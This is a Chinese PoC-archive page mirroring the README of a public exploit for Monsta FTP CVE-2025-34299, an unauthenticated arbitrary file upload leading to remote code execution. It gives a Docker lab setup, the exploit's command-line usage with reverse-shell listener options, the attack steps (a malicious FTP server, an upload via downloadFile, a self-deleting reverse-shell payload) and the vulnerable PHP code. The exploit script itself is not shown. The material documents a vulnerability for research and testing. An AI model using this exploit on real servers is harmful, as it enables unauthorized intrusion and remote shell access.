支持本站 — 捐款将帮助我们持续运营

目标:1000 元,已筹:752

75.2%
立即捐款

POC详情: 15f266044e31a6189d7fa9ed1376d65a18d3b39a

来源
https://github.com/Chocapikk/CVE-2025-34299
关联漏洞
标题:Monsta FTP 安全漏洞 (CVE-2025-34299)
描述:Monsta FTP是新西兰Monsta公司的一款轻量级文件管理器。它支持文件传输、文件管理和文档编辑等功能。 Monsta FTP 2.11及之前版本存在安全漏洞,该漏洞源于允许未经身份验证的任意文件上传,可能导致执行任意代码。
描述
MonstaFTP Unauthenticated File Upload
介绍
# Monsta FTP CVE-2025-34299 Exploit

Python exploit for the RCE vulnerability in Monsta FTP (CVE-2025-34299).

## Description

This vulnerability allows arbitrary PHP code execution on the Monsta FTP server by exploiting the `downloadFile` functionality which allows downloading files from a malicious FTP or SFTP server. The exploit establishes a reverse shell connection using pwntools.

**Note:** While the [watchTowr Labs research](https://labs.watchtowr.com/whats-that-coming-over-the-hill-monsta-ftp-remote-code-execution-cve-2025-34299/) demonstrates the vulnerability using SFTP, this exploit uses FTP which also works perfectly fine.

## Prerequisites

- Python 3.x
- Docker and Docker Compose (optional)
- Network access to download Monsta FTP from archive.org

## Installation

Install Python dependencies:

```bash
pip install -r requirements.txt
```

## Usage

### Setting up the lab

The Dockerfile automatically downloads and installs Monsta FTP 2.10.4 from archive.org during the build process.

**Build and start the lab:**

```bash
cd lab
docker build -t monsta-ftp:2.10.4 .
docker run -d --name monsta-ftp-test -p 8080:80 monsta-ftp:2.10.4
```

**Alternative with Docker Compose:**

```bash
cd lab
docker-compose up -d
```

The lab will be available at `http://127.0.0.1:8080/mftp`

**Verify the installation:**

```bash
curl http://127.0.0.1:8080/mftp/
```

You should see the Monsta FTP login page.

**Container management:**

- Stop the container: `docker stop monsta-ftp-test`
- Start the container: `docker start monsta-ftp-test`
- View logs: `docker logs monsta-ftp-test`
- Stop and remove the container: `docker rm -f monsta-ftp-test`
- Rebuild the image: `docker build -t monsta-ftp:2.10.4 .`

### Running the exploit

Once the lab is running, execute the exploit:

```bash
python3 exploit.py http://127.0.0.1:8080/mftp
```

**Options:**

- `--host`: FTP server host (default: 172.17.0.1)
- `--port`: FTP server port (default: 2121)
- `--lhost`: Listener host for reverse shell (default: 172.17.0.1)
- `--lport`: Listener port for reverse shell (default: 4444)

**Example with custom listener:**

```bash
python3 exploit.py http://127.0.0.1:8080/mftp \
  --lhost 172.17.0.1 \
  --lport 4444
```

**How it works:**

1. Starts a malicious FTP server with a reverse shell payload
2. Uploads the payload to Monsta FTP via the vulnerable `downloadFile` endpoint
3. Triggers the payload execution
4. Establishes an interactive reverse shell using pwntools

The payload automatically deletes itself after execution.

## Technical Details

### Why FTP Works Too

While the [watchTowr Labs research](https://labs.watchtowr.com/whats-that-coming-over-the-hill-monsta-ftp-remote-code-execution-cve-2025-34299/) demonstrates the vulnerability using SFTP, FTP works identically because both connection types use the same vulnerable pattern:

**SFTP Implementation** (`SFTPConnection.php`):
```php
protected function handleDownloadFile($transferOperation) {
    $remoteURL = $this->getRemoteFileURL($transferOperation->getRemotePath());
    if(@copy($remoteURL, $transferOperation->getLocalPath()))
        return true;
    // ...
}
```

**FTP Implementation** (`FTPConnection.php`):
```php
protected function handleDownloadFile($transferOperation) {
    return @ftp_get($this->connection, 
                    $transferOperation->getLocalPath(),  // <-- User-controlled destination
                    $transferOperation->getRemotePath(),
                    $transferOperation->getTransferMode());
}
```

In both cases, `getLocalPath()` returns the user-controlled `localPath` parameter from the request context, allowing arbitrary file write to any location on the server's filesystem. The only difference is the PHP function used (`copy()` for SFTP vs `ftp_get()` for FTP), but both accept user-controlled destination paths without proper validation.

## References

- [CVE-2025-34299](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-34299)
- [watchTowr Labs - Monsta FTP Remote Code Execution CVE-2025-34299](https://labs.watchtowr.com/whats-that-coming-over-the-hill-monsta-ftp-remote-code-execution-cve-2025-34299/) (Note: The research demonstrates SFTP, but FTP works as well)
文件快照

 [4.0K]  /data/pocs/15f266044e31a6189d7fa9ed1376d65a18d3b39a
├── [5.9K]  exploit.py
├── [4.0K]  lab
│   ├── [ 191]  docker-compose.yml
│   └── [ 786]  Dockerfile
├── [4.1K]  README.md
└── [  51]  requirements.txt

2 directories, 5 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。